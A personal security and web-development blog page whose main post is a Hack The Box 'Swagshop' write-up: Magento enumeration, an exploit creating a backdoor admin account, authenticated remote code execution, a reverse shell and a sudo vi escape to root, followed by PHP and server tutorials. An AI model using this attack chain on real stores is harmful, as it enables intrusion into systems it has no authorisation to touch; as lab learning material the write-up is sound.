Thursday, December 3, 2020

Hack The Box - Swagshop - CTF writeup



So in preparation for the OSCP and to get better at understanding security vulnerabilities I have been doing what are commonly referred to as capture the flag challenges. Here I will go over a unique vulnerability that allows remote access to a "user.txt" file and a "root.txt" file. The root.txt file can only be acquired remotely if I can gain remote command execution as the root or system user. Since this is a Linux based system I will be trying to escalate my privileges up to root so I can control the system and do the file retrieval. 

The biggest and initial step is enumeration. So far I just know there is a box with an IPv4 address of 10.10.10.140. From the name I can assume perhaps that this is a shop of some kind but that is all the initial information given. In essence this CTF is mirroring what you would refer to as black box testing in a security or penetration testing job. Here perhaps a shop owner is concerned about their security and would like to see what if anything bad could happen if an attacker targeted their site so they can know what to patch or fix ASAP. Let's proceed with initial enumeration. I'll start with Nmap.


The initial Nmap scan reveals a common setup. There are two ports open. The service known as ssh or secure shell is open on port 22 which is operating with the tcp or transmission control protocol and is using OpenSSH 7.2p2. This allows an admin to remotely control the machine but without a password I would have to check the version to see if it is a vulnerable or patched version. Next I see that port 80 is open running from an Apache/2.4.18 Ubuntu server. 




Well that is rather strange. Our initial scan revealed what appears to be a common web server but we are unable to connect on port 80. Perhaps let me try some DNS rebinding by adding this IPv4 address to my etc/hosts files so my local machine will resolve to the proper address.

 
It is still not loading. To double check to see if there is data and that it's not an issue from how I am browsing I like to get manual and use the command line. I used a simple cURL request to see the page.


Nice, now we are getting somewhere. This looks more like what I was expecting to be hosted on port 80. There is a webpage and I can see the store is running Magento and we are indeed looking at an e-commerce site. 

It was a proxy issue I needed to configure this since in the background I am also using burpsuite to intercept and analyze requests. This just basically means I am routing all the traffic from the site through this tool that allows for more manual analysis and testing.



Sometimes, trial and error is the best teacher. So in fact the site was actually not resolving because I was going to https://10.10.10.140 and not http://10.10.10.140. Since this is for practice the site does not have proper security certificates and therefore when trying to access via https the web browser by default tries to access port 443 which is unavailable. A request in a browser to http goes to port 80 which is open and now here we are at the store. 





Now when I go to see the login page I see an interesting behavior in how the server is handling the request. It is common to see a login just served from a web root directory but here I see that there are path parameters in the URL which for a Magento site makes sense since these links are interacting with a database on the backend. So the URL I get sent to when I attempt to login is: 
http://10.10.10.140/index.php/customer/account/login/. The index.php before the /customer/account/login is of particular interest. Let's keep that in our notes and move forward. 

I now want to see what else is on this server so I will use "gobuster" as follows: 


Ok, /app with a 301 is interesting to me so I went and explored that folder. Within it I found /etc/local.xml. This config file has an install date and a key so I'll add that to my notes because keys are usually important if you find them lying around.


Also, the site is using Mage with a copyright date of 2008. Let's check the site to see what version of Magento they are running. Wow, just as I suspected they are running a very old version of Magento. This store is being setup with a 2014 version of Magento. It is always important to use the latest versions of software to have the latest patches against dangerous vulnerabilities. This got me thinking I should perhaps see if I don't have to reinvent the wheel here. Ok, this is good, there appear to be quite a few exploits within Metasploit for Magento. Perhaps what we are looking for already exists which will make this engagement a lot easier than having to code some exploits from scratch. The one that first stands out in the list of potential exploits is the authenticated remote code execution. However we will have to create an admin user to use that one. Upon doing some quick googling I come to find that there is also an exploit that allows me to create an admin user. Perfect. So this will be two steps to get the initial shell. I will have to create an admin account I can use and then run the following exploit with authenticated credentials to have the remote machine connect back to my testing(attacker) box. Here below I am looking at the exploit to create a new admin user. A few points to note are that the default username:password combination will now be forme:forme. In a real penetration test or red team engagement from a public IP you would want to change this to be secure so an attacker from the outside doesn't inadvertently use the backdoor you have just created. Here I am just on a VPN and this is a practice box so this is fine. Also, upon trying to navigate to the /admin/Cms_Wysiwyg/directive/index/ directory I see that this is not allowed. 





Well this is rather strange. The directory in the exploit doesn't seem to be accessible in this version of Magento on this particular Apache server. This is going to create a big problem because without that working we won't be able to create the new admin account. But then I remembered something critical. 



Do you remember the path parameters from the initial reconnaissance? I tried including index.php before the directory in the url being requested in the exploit and am now granted access to an admin panel. This is great because now that we have a path to access the admin panel we can attempt to run the exploit without it just getting 403 errors from the server. 

Ok, so here is a quick overview of the python exploit code I will run against this Magento server. Like I said before you would want to modify the password for security on a real red team engagement. However, here for the purpose of this exercise I am going to just set the target URL and include the path parameter of /index.php. 



Now it's time for the rubber to meet the road. Let's see if this exploit works.


Excellent! The exploit worked and the first piece of this puzzle is finally falling into place. Let's test it out. We are now successfully logged in as user "forme". There used to be another exploit that could be run within this panel but it has been patched on this version of Magento. So for now let's log out and return to the authenticated RCE code we had seen above now that we have a way for the program to authenticate with our newly created admin credentials. 




Now I will move onto the other python exploit and see what needs to be modified for this particular scenario. Interestingly enough it looks like there is a php function with an argument of 'system' which will allow for the code execution. I configured it with the newly created credentials. And this highlights the importance of reconnaissance in addition to good note taking. I need the exact install date but I have that from the xml file I had found at the beginning in that /app folder. Perfect, this is the missing piece that this exploit needs to work against this particular version of Magento. The exact date and time of install are needed to proceed. Here below you can see how I modified the code:


Well, that is not what was expected. It doesn't run and python is giving some error about no control matching. I see that the module being used in mechanize so I assume there are some issues with the automated requests being sent by this headless browser of sorts. 


Unfortunately, that wasn't it. I tried a few variations of the url, included the /index.php and /admin which seems to have solved that problem. Very cool. I don't want to get into all the debugging details but suffice it to say there were a few more variations to get this code running with the newer version of mechanize than when this box was first created. However, moving forward, when I tested with the system command of 'whoami' I see that I am getting remote code execution on this system as 'www-data'. This is good because now I can see if I can establish a foothold with a shell even if it is a low level shell like the one assigned to www-data. For good measure I want to make sure the script is executing on the server correctly so I try to retrieve the /etc/passwd file. 



This is great because at this point I am able to do remote code execution on the remote machine. Now to have more control and possibly escalate my privileges I will need an initial shell which is an interactive prompt that allows me to control the machine remotely. I setup a simple netcat listener but had trouble. The issue was that it seems that a firewall was blocking all my attempts except on port 443. There was also something particular with the bash nesting for this to work. However, as you can see in the screenshots below I got the first shell and was able to upgrade it to a proper shell using "python3 -c 'import pty;pty.spawn("/bin/bash")'. Then you pause the session, modify it and return to an interactive prompt that now allows more editing without freezing or hanging.




At this point this solves the first challenge and from here it's a matter of just navigating to the user's desktop. In this case the user is named 'haris' and the 'user.txt' file is on their desktop. 



Now from the output above when checking for sudo privileges I see that this user has access to run /usr/bin/vi and appears to have wildcard editing access on /var/www/html/*.  I go ahead and open index.php in vi which is a process that I am now running as root. I then, instead of doing :wq! to exit do :!/bin/bash and I am dropped right into the root user's command prompt with full system control and privileges.


From here it is a matter of just navigating to the correct folder to retrieve the 'root.txt' flag. This was a fun box with some tricky little challenges in regards to path parameters in the url, python module debugging and finally an interesting privilege escalation at the end there. I have been learning a lot doing these challenges and I find that there are few things as exciting as getting to be "root".












Tuesday, June 9, 2020

PHP - Sending e-mail data from a server's localhost


This is a fun example I created from following some tutorials on YouTube. I have built SMTP servers in previous examples, but this can be used to send e-mails from a webpage to a server for contracts or something as simple as a guestbook where an admin would like to have a system send automated e-mails to marketing, sales or management teams.

I used the PHPMailer library found on GitHub for the backend processing. For the front page I just made a simple form where the user can send a resume to a recruiter.

         

And don't worry this won't just let you put any name in the email text box. The e-mails need to come from a legitimate source such as the secured website where this will be hosted in production. The above was rendered from the code below. Nothing fancy here, just a simple form for submitting attachments. 


Success! The form works as intended and I got the test e-mail in my Gmail inbox from my test server.



Wednesday, June 3, 2020

PHP & jQuery - File/image uploader

For this example I created a page where a user can upload files & images to a web server. The items are stored and reflected so the user can see their multiple uploads. With PHP below I am handling the uploads and if the file already exists the user is notified that they are trying to do a duplicate upload.


And here this is defining the main work being done by this page. This is handling the file type to only allow images with extensions of: .gif, .jpg, .png, .jpeg. The size is also restricted to 500KB.


This is what the page looks like below with a little formatting. The alert below was triggered by trying to upload a file without one of the allowed extensions.



This is now echoing back to the screen the file size restrictions because an excessively large file was being uploaded.

In this block I create the div tags for the "dropZone" above and set the input type to handle the multiple attachments as an array.



And now below you can see what the page looks like after multiple successful image file uploads. The completion stage of the file uploads are shown during the upload. With this a user can upload images to a CRM system for sales, a profile picture for social media or a variety of other systems. The file types and sizes here were customized so this same format can be used to upload any file type of any size.



Monday, June 1, 2020

Using Google reCAPTCHA v2

What is a reCAPTCHA? You have seen them online and perhaps have been wondering how they work. I know I have been seeing these for years but didn't really understand them until I saw the process. In this example I don't go into the creation of the system behind reCAPTCHA's, but rather here I am just showing how to use the Google reCAPTCHA v2. I have seen these used ubiquitously all over the internet and I decided to learn what they are and how I can implement them on my own sites to verify that my site's users are indeed people and not bots.

The PHP is pretty standard. I send the API a user's name, Key, response Key and IP address. Then I get the file contents, decode the JSON and verify a user's authenticity.


PHP CODE:



HTML CODE:

The HTML code for this example is just a simple sample text box form for a user's name, this can be for a username, email or even to verify if a survey is being taken by a human rather than by a bot. The uses for this are endless and that is why you can find these all over the internet.



This next part had me stuck for a moment, I had been referencing some old tutorials and now Google has buttoned down their security for this a bit. To get the correct responses the site needs to be served over HTTPS. I quickly added an SSL cert with Let's Encrypt and now it works properly. Here in this screenshot you can see a simple form box where you can enter your name. Once a user clicks the reCAPTCHA and it verifies that they are not a bot the request is accepted and I am just echoing back the user input. For an application or website I would just pipe the output to whatever database or other page rather than the echo which is done here for illustrative purposes below.


I included this to show the flow of reCAPTCHA although most people have probably seen this as they explore the internet.

Upon successful completion of the above little exercise the system authenticates that a user is authentic or not. Here since the reCAPTCHA was completed successfully and I entered my name as 'J', the system tells me it verified that I'm not a bot and that is has captured my name as 'J'. This system is particularly interesting because its initial purpose was to help digitize illegible books and now it's used to verify users as humans. So not only did I learn some cool PHP tricks while learning how to do this, I also learned a little more about internet history.


Thursday, May 21, 2020

PHP - CSRF tokens

In this example I created a simple CSRF token to validate a user's identity. Obviously the final implementation is going to take more than what I am showing here. But the point here is to understand what CSRF tokens are, how they are created and how they are used.

A CSRF token, is unique to each user and is created in a randomized way. It is then used to identify the subsequent HTTP request and make sure the server is communicating the right data with the correct client. Below in PHP I start a session and then you can see that the session key tied to each user is a bin2hex() function which converts a string of characters to hexadecimal values. So that it remains unpredictable it is then multiplied using the random_bytes function. Random_bytes is a function that cryptographically generates pseudo-random bytes.



The HTML is a simple submit form where a user enters their name and a CSRF token is then created. Within this code you can see that the CSRF token is created using sha256 encryption. Then when the CSRF token matches the name that is submitted the page will reflect "Your name is: (your name you have submitted)". 


Here is what the output looks like when the name matches the token.


Here is a view from the Console to see what the page is doing. You can see the long encoded csrf value that is created when I enter my name 'Jason'.


Here since I haven't created somewhere to store values I am going to manually change the values for illustrative purposes. Now I put the value as changedValue0101010101. When I click submit this CSRF token will not match my name and the error message will be displayed.





CSRF tokens are used widely around the internet to ensure safety and are a great mechanism for a server to be able to identify users and to verify identities in HTTP requests.







Wednesday, May 20, 2020

Mouseflow for understanding customers and visitors

I found this today and it's quite interesting. With Mouseflow on a web page I am able to see recorded user sessions. This is particularly interesting because you can fully put yourself in the shoes of your visitors and see exactly how they interacted with a web page. It didn't seem to capture my particles.js particles I put on the test page, but it captured everything else. So it's not perfect but it seems to accurately record all the visitor's movements and actions. 

This is obviously more useful as you analyze thousands of visitors and then clear patterns can be more visible. So by taking into account what parts of a site people hover a mouse over or what they actually click on it gives a direction for what to focus on based on the site's user base.

The installation was quite simple. I included this little javascript tag:

        <!--Mouseflow Test -->
        <script type="text/javascript">
            window._mfq = window._mfq || [];
            (function() {
                var mf = document.createElement("script");
                mf.type = "text/javascript"; mf.defer = true;
                mf.src = "//cdn.mouseflow.com/projects/XX.js";
                document.getElementsByTagName("head")[0].appendChild(mf);
            })();
        </script>

I then activated the test page from the Mouseflow owner account and after I visited the page I was able to see my recorded session. 


Tuesday, May 19, 2020

Using Memcached to store and retrieve session data

I started with creating an Ubuntu VPS. I then installed Memcached from the CLI via SSH from my local machine. I secured the '.conf' file by setting it to listen on localhost and disabling UDP. I then configured SASL support for connecting my PHP scripts to the backend SQL database.


I then added Apache and PHP to the server. Next I created a php info page and put it on the server to view the memcached information. I can see that memcached is installed and is communicating with PHP properly.


 

Next to get a simple connection working and some data flowing back and forth I created this simple php page with a key. This script opens a new Memcached instance to the localhost and gets the requested key. If no key is found it adds one. On the next refresh then the newly created key which is a string of text is retrieved from Memcached.









Wednesday, May 13, 2020

Add cPanel & WHM to CentOS VPS (Log Rotation, Configuring BIND nameserver & Backups...)


For this example I added cPanel & WHM to a CentOS VPS I created. Upon installation of cPanel I did a lot of configurations including setting up the log rotations, a BIND nameserver and backups.

The installation from the command line is simple. The syntax is just a little different than most of the other posts where I use Ubuntu because that's my favorite version of Linux. However, I like to use the most efficient tools when I can and in this case it's CentOS. I have done a fair amount of scripting and automation using CentOS and Vagrant boxes so this was a cinch.  

To install the latest version of cPanel from the command line the commands are as follows:

cd /home
wget -N http://httpupdate.cpanel.net/latest
sh latest
/usr/local/cpanel/cpkeyclt 



From here the most difficult parts are done and the rest is quite intuitive if you've worked with servers and monitoring systems. I added my email and the nameservers to begin with. As you can see below with cPanel it is more about just knowing how to configure the system and you just select your parameters. For example at the bottom of this screen shot you can even select how you want to receive Apache logs. 


Next I was able to configure the Log Rotation. Log rotation is important to not use up all of a system's resources. In this automated process log files are compressed and stored within an archive folder for cPanel.


The cPanel allows for a lot of customization. In a previous blog post I went over how to manually create Cron Jobs: https://jgardnerla.blogspot.com/2020/04/cron-job-daemon-shell-script-to-send.html. However, with cPanel it's very simple to just plug in the days and times you want updates and backups to run. The manual process is good because it allows you to do more customization but this is a good solution if you want simple administration from a GUI.



As simple as cPanel is to use there is a lot it can do. Here I synchronized the server time which is important when serving requests and handling HSTS.

The server is just getting setup but here are the initial server logs. The system is starting up and the daemon's are beginning to listen on their appropriate ports so that they can spring into action when they are needed.


And here is the BIND nameserver starting up successfully.




Now to administer the cPanel I can just return to the secure portal and begin with any customizations or configurations that are required.

Automated Exploitation of a Bluetooth vulnerability that leads to 0-click code execution

This blog post covers an interesting vulnerability that was just discovered earlier this year and an open source free tool that was created ...